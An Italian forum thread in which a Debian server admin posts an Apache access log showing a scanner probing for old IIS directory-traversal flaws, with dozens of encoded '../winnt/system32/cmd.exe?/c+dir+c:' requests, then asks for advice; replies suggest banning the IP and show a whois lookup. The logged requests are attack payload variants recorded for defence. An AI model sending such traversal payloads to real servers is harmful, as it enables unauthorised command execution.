|
|||||||
|
|
|
![]() |
|
|
Strumenti |
|
|
#1 | |
|
Senior Member
Iscritto dal: May 2003
Città: Pontedera
Messaggi: 569
|
Strani log apache
Non so se è la sezione adatta, ma considerato che la macchina su cui ho trovato questi log ha su una Debian con apache 2 non dovrebbe neanche essere la più sbagliata....
Codice:
apache2/access.log 204.17.105.163 - - [23/May/2006:06:42:06 +0200] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 308 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:07 +0200] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 305 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:08 +0200] "GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 327 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:08 +0200] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:09 +0200] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:09 +0200] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 335 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:10 +0200] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 337 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:10 +0200] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 335 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:11 +0200] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 330 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:12 +0200] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 328 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:12 +0200] "GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 337 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:13 +0200] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 330 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:13 +0200] "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 338 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:14 +0200] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 331 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:15 +0200] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 336 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:15 +0200] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 329 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:16 +0200] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 338 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:16 +0200] "GET /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 338 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:17 +0200] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 331 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:18 +0200] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 329 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:18 +0200] "GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 324 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:19 +0200] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:19 +0200] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:20 +0200] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:21 +0200] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:21 +0200] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 324 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:22 +0200] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 328 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:22 +0200] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 324 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:23 +0200] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 328 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:24 +0200] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 325 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:24 +0200] "GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 318 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:24 +0200] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 315 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:25 +0200] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 290 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:26 +0200] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 291 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:26 +0200] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:27 +0200] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:28 +0200] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:29 +0200] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:29 +0200] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:30 +0200] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:30 +0200] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:31 +0200] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:31 +0200] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 336 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:32 +0200] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 329 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:33 +0200] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 312 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:33 +0200] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 316 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:34 +0200] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 326 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:34 +0200] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 316 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:35 +0200] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:36 +0200] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:36 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 313 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:37 +0200] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:37 +0200] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:38 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 313 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:39 +0200] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:40 +0200] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:40 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 313 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:41 +0200] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 313 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:41 +0200] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:42 +0200] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 314 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:43 +0200] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 315 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:43 +0200] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 316 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:44 +0200] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:44 +0200] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 292 "-" "Mozilla/3.0 (compatible; Indy Library)" 204.17.105.163 - - [23/May/2006:06:42:45 +0200] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 293 "-" "Mozilla/3.0 (compatible; Indy Library)" Cercando di rintracciare da dove veniva l'attacco ho trovato : Quote:
A questo punto che faccio? Invio una e-mail al loro webmaster per segnalare la cosa? Si accettano suggerimenti.
__________________
MSI Z68A GD65 (G3)0, i7 - 2600 @3400 Mhz, 4 x 4 GB DDR3 1333 Corsair, Sapphire R 290 TRI-Xcules 4GB DDR5, Corsair Force GT 256 GB & Western Digital Caviar Black 2TB |
|
|
|
|
|
|
#2 |
|
Senior Member
Iscritto dal: Jun 2004
Messaggi: 369
|
ciao, come si fa a terminare apache.exe? dal task manager mi nega l'accesso!
__________________
| Italiani Liberi | |
|
|
|
|
|
#3 |
|
Senior Member
Iscritto dal: Jun 2004
Messaggi: 369
|
risolto grazie
__________________
| Italiani Liberi | |
|
|
|
|
|
#4 | |
|
Senior Member
Iscritto dal: Jun 2004
Messaggi: 369
|
Quote:
Sulla macchina non c'era un antivirus o un antispy? Conosci un modo per tenere sotto controllo le comunicazioni del server Apache? Sto iniziando ad usarlo per un database e non vorrei che le contenute informazioni fossero carpite. grazie. (scusa per aver sporcato la discussione)
__________________
| Italiani Liberi | |
|
|
|
|
|
|
#5 | |
|
Senior Member
Iscritto dal: May 2003
Città: Pontedera
Messaggi: 569
|
Quote:
__________________
MSI Z68A GD65 (G3)0, i7 - 2600 @3400 Mhz, 4 x 4 GB DDR3 1333 Corsair, Sapphire R 290 TRI-Xcules 4GB DDR5, Corsair Force GT 256 GB & Western Digital Caviar Black 2TB |
|
|
|
|
|
|
#6 |
|
Senior Member
Iscritto dal: Sep 2003
Città: Bergamo
Messaggi: 1176
|
Banna direttamente l'ip o addirittura tutta la network della società a livello di ip. Poi guarda tramite il whois se c'è una email dell'abuse (nel 90% dei casi non serve ad un tubo, ma tentar non nuoce).
__________________
VGA? No grazie, preferisco le SERIALI! http://daniele.vigano.me | Home server HP Proliant MicroServer (Fedora 64bit) | Notebook Dell Latitude E5450 (Fedora 64bit) | Mobile Moto G3 GEM HPC Cluster Dell PowerEdge R720xd + R720 + R420 + M1000e + M915 (Ubuntu LTS 64bit) up to 1000 cores | EATON UPS |
|
|
|
|
|
#7 | |
|
Senior Member
Iscritto dal: May 2003
Città: Pontedera
Messaggi: 569
|
Quote:
Non hanno un'e-mail per l'abuse, ma in compenso ho scoperto la loro gamma di ip, al momento non li banno e magari farò una segnalazione al loro webmaster, ma se scopro altri movimenti sospetti dai loro ip gli banno tutta la gamma degli ip che hanno a disposizione. Codice:
$ whois --verbose 204.17.105.163
Uso il server whois.arin.net.
Richiesta: "204.17.105.163"
Conversent Communications CONVERSENT-204-17-64 (NET-204-17-64-0-1)
204.17.64.0 - 204.17.127.255
Teleran Technologies, Inc. OEMN-204-17-105-160 (NET-204-17-105-160-1)
204.17.105.160 - 204.17.105.167
# ARIN WHOIS database, last updated 2006-05-25 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
__________________
MSI Z68A GD65 (G3)0, i7 - 2600 @3400 Mhz, 4 x 4 GB DDR3 1333 Corsair, Sapphire R 290 TRI-Xcules 4GB DDR5, Corsair Force GT 256 GB & Western Digital Caviar Black 2TB |
|
|
|
|
|
|
#8 | |
|
Senior Member
Iscritto dal: Jun 2004
Messaggi: 369
|
Quote:
__________________
| Italiani Liberi | |
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 00:14.



















